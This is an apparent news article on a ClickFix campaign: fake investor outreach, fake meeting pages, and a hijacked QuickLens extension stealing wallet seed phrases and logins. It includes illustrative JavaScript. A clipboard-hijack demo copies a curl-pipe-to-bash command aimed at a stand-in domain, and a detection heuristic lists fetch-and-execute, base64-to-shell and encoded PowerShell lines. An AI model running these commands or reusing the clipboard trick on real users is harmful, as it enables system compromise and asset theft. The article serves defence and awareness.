ClickFix New Threat: Hackers Impersonate Investors, Steal Wallets and Data Through a Browser Extension

The cybersecurity industry faces a growing threat as a group of hackers focused on digital assets has refined the "ClickFix" technique to cause more damage. According to Moonlock Lab, the security research group that disclosed the campaign, the attackers are targeting cryptoassets and digital wallets, and are using identity deception to lure victims into revealing sensitive information and losing their assets.

New Attack Method: Impersonating a Fund Executive and Luring Victims with a Fake Meeting Link

The attackers are using "ClickFix" in a new form, posing as executives from venture capital firms such as SolidBit, MegaBit, and Lumax Capital and inviting targets to take part in a project. The approach starts with contact over LinkedIn, using messages that appear genuine, and victims are drawn into interviews or discussions about the supposed project.

Once the victim accepts the invitation, the attacker sends a link to a fake Zoom or Google Meet room. The fake meeting page shows a "verify your identity" button that imitates a Cloudflare check but is itself fake. When the user clicks it, the page copies a malicious command to the clipboard. The command is presented as a step needed to set up the meeting, but it is in fact code designed to compromise the victim's system once pasted and run.
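The mechanism described above, as an added illustration written for this article and not code recovered from the campaign: the page displays one thing and writes something else to the clipboard. The button and clipboard stand-ins, the command string, and the non-routable domain example.invalid are all constructed. Browsers generally gate clipboard writes behind a user gesture such as a click, which is exactly why the fake verification button exists.

```javascript
// Added example: the page-side pattern behind a ClickFix "verify" button.
// Illustrative code for this article, not code from the campaign. The command,
// the domain example.invalid and the element names are constructed.
const MALICIOUS_COMMAND =
  'curl -fsSL https://example.invalid/meet-setup.sh | bash'; // constructed, non-routable

// What the victim actually reads on the page.
const VISIBLE_INSTRUCTIONS =
  'Verify you are human, then paste the meeting setup command into Terminal.';

// Minimal stand-in for a DOM button so the click handler can run outside a browser.
function makeButton(label) {
  const handlers = [];
  return {
    label,
    addEventListener(type, fn) {
      if (type === 'click') handlers.push(fn);
    },
    click() {
      handlers.forEach((fn) => fn());
    },
  };
}

// In a real page `clipboard` is navigator.clipboard; the click supplies the user
// gesture the browser requires before it allows the write. Here the clipboard is
// injected so the behaviour can be exercised without a browser.
function wireClickFixButton(button, clipboard) {
  button.addEventListener('click', () => {
    clipboard.writeText(MALICIOUS_COMMAND);
  });
}

// Simulates one victim click and returns what was shown next to what was copied.
function simulateClick() {
  const copied = [];
  const clipboard = {
    writeText(text) {
      copied.push(text);
      return Promise.resolve();
    },
  };
  const button = makeButton('Verify');
  wireClickFixButton(button, clipboard);
  button.click();
  return { shown: VISIBLE_INSTRUCTIONS, copied: copied[0] };
}
```

The point a user can act on is the mismatch: the page never shows the command, so anything that lands on the clipboard after a "verification" click should be read before it is pasted anywhere.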

Browser Extension Hijacked: QuickLens Becomes an Attack Weapon Against Cryptoassets

In addition to luring victims through fake links, the attackers use a second method: taking over browser extensions. John Tuckner, founder of Annex Security, revealed that a Chrome extension called QuickLens passed into the attackers' hands on February 1.

Only two weeks after the ownership change, the attackers released a new version of QuickLens containing hidden malicious code. This version not only supports the ClickFix attack but is also designed to steal user data as covertly as possible. Once installed, the compromised extension silently monitors the user's activity.

What Information Is at Risk and How Large the Danger Is

The compromised QuickLens extension had about 7,000 users before it was removed from the Chrome Web Store once the irregularities were discovered. Losses may already have occurred during the time the extension remained available.

The malicious code hidden in the extension scans the user's digital wallet data for recovery (seed) phrases. It also harvests information from the user's Gmail account and YouTube activity and, most importantly, login and payment details on various websites. Combined, this information lets the attacker quietly access the victim's digital assets.
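The check a practitioner would want after an extension changes hands (the takeover above, followed by a release that reads wallet, Gmail and YouTube pages) is to compare the capabilities of the last trusted version against the new one. The following is an added example written for this article, not QuickLens code or Annex Security's analysis; the two manifests, the extension name "Example Lens", the version numbers and the high-risk permission list are constructed assumptions. Chrome only pauses an update for re-approval when the new permissions carry a warning the old ones did not, so a review of the manifest diff is worth doing independently.

```javascript
// Added example (not QuickLens code): flag risky capability growth between two
// versions of a Chrome extension manifest. Both manifests are constructed.
const HIGH_RISK_PERMISSIONS = new Set([
  'tabs', 'webRequest', 'webRequestBlocking', 'scripting', 'cookies', 'history',
  'clipboardRead', 'clipboardWrite', 'debugger', 'nativeMessaging', 'management',
]);

// Host patterns may appear in `permissions` (Manifest V2) or `host_permissions` (V3).
function isHostPattern(p) {
  return p === '<all_urls>' || p.includes('://');
}

function hostPatterns(manifest) {
  const all = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return new Set(all.filter(isHostPattern));
}

function apiPermissions(manifest) {
  return new Set((manifest.permissions || []).filter((p) => !isHostPattern(p)));
}

// Patterns that reach every site, which is what a wallet/webmail stealer needs.
function isBroad(pattern) {
  return pattern === '<all_urls>' || /^\*:\/\/\*\//.test(pattern) || /^https?:\/\/\*\//.test(pattern);
}

function contentScriptMatches(manifest) {
  return (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
}

// Returns human-readable findings for capabilities the new version gained.
function diffManifests(oldManifest, newManifest) {
  const findings = [];
  const oldApi = apiPermissions(oldManifest);
  for (const p of apiPermissions(newManifest)) {
    if (!oldApi.has(p) && HIGH_RISK_PERMISSIONS.has(p)) findings.push(`new high-risk permission: ${p}`);
  }
  const oldHosts = hostPatterns(oldManifest);
  for (const h of hostPatterns(newManifest)) {
    if (!oldHosts.has(h)) findings.push(`${isBroad(h) ? 'new broad host access' : 'new host access'}: ${h}`);
  }
  const oldCs = contentScriptMatches(oldManifest);
  for (const m of contentScriptMatches(newManifest)) {
    if (!oldCs.includes(m) && isBroad(m)) findings.push(`content script now injected on: ${m}`);
  }
  return findings;
}

// Constructed "before" and "after" manifests for a hypothetical extension takeover.
const BEFORE = {
  manifest_version: 3, name: 'Example Lens', version: '1.4.0',
  permissions: ['activeTab', 'storage'],
  host_permissions: [],
  content_scripts: [],
};
const AFTER = {
  manifest_version: 3, name: 'Example Lens', version: '1.5.0',
  permissions: ['activeTab', 'storage', 'tabs', 'cookies', 'clipboardWrite'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'], run_at: 'document_start' }],
};

function auditExampleUpdate() {
  return diffManifests(BEFORE, AFTER);
}
```

Run the diff against the unpacked copy of the previously trusted version and the new release; any finding is a reason to keep the update disabled until the new code has been read, since a content script on every origin is all an extension needs to read wallet, webmail and checkout pages.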

Why the ClickFix Strategy Has Become More Disruptive

Researchers investigating the campaign point out that ClickFix is hard to stop because the protective mechanisms are bypassed with the victim's own participation: the command is copied to the clipboard and pasted into the terminal by the user, so the system sees a routine, user-initiated operation rather than an anomaly. This makes it a highly effective way to circumvent protection.
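One defensive consequence of the point above: because the user pastes and runs the command, the evidence sits in shell history and process command lines rather than in a downloaded file or an exploit. The following is an added example for this article, not a published rule from the researchers, that scores command lines for ClickFix-style "paste and run" indicators; the indicator list, weights, threshold and the sample history lines (including the domain example.invalid) are all constructed.

```javascript
// Added example, not a published detection rule: score shell command lines for
// ClickFix-style "paste and run" indicators. Indicators, weights and the sample
// history below are constructed for this article.
const INDICATORS = [
  { name: 'fetch piped to shell', weight: 5, re: /\b(curl|wget)\b[^|]*\|\s*(ba|z|)sh\b/ },
  { name: 'base64 decode piped to shell', weight: 5, re: /base64\s+(-d|--decode)\b[^|]*\|\s*(ba|z|)sh\b/ },
  { name: 'hidden or encoded PowerShell', weight: 5, re: /powershell[^\n]*-(w(indowstyle)?\s+hidden|enc(odedcommand)?)\b/i },
  { name: 'mshta/rundll32 launcher', weight: 4, re: /\b(mshta|rundll32)\b/i },
  { name: 'osascript execution', weight: 3, re: /\bosascript\b/i },
  { name: 'silent download flags', weight: 2, re: /\b(curl|wget)\b[^|]*\s-(fsSL|sL|q)\b/ },
  { name: 'raw IP or throwaway TLD in URL', weight: 2, re: /https?:\/\/(\d{1,3}(\.\d{1,3}){3}|[^\s/]+\.(top|xyz|icu|click|invalid))(\/|\s|$)/ },
  { name: 'meeting/verification decoy comment', weight: 2, re: /#\s*(meeting|zoom|meet|setup|verif)/i },
];

// Scores one command line; a total of 5 or more is treated as suspicious, so a
// single strong indicator (fetch-and-execute, encoded PowerShell) is enough.
function scoreCommand(cmd) {
  const matched = INDICATORS.filter((i) => i.re.test(cmd));
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  return { cmd, score, hits: matched.map((i) => i.name), suspicious: score >= 5 };
}

// Returns only the suspicious entries from a list of history or process lines.
function scanHistory(lines) {
  return lines.map(scoreCommand).filter((r) => r.suspicious);
}

// Constructed sample: three ClickFix-style pastes mixed with routine developer commands.
const SAMPLE_HISTORY = [
  'curl -fsSL https://example.invalid/meet-setup.sh | bash  # zoom meeting setup',
  'echo "bWtkaXIgLXAgfi8udG1wCg==" | base64 -d | sh',
  'powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
  'git pull && npm install',
  'brew install --cask zoom',
  'ls -la ~/Downloads',
];
```

The useful property is that the heuristic keys on the shape of the command rather than on a specific domain or payload, so it still fires when the attacker rotates infrastructure; the cost is the expected false positives on legitimate `curl | sh` installers, which is why the output is a review queue rather than a block list.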

The evidence from this "ClickFix" campaign shows that the attackers have refined their tactics to be more personal and closer to the target, increasing the likelihood of success. Human nature and the trust built up over a conversation have become the biggest vulnerabilities.
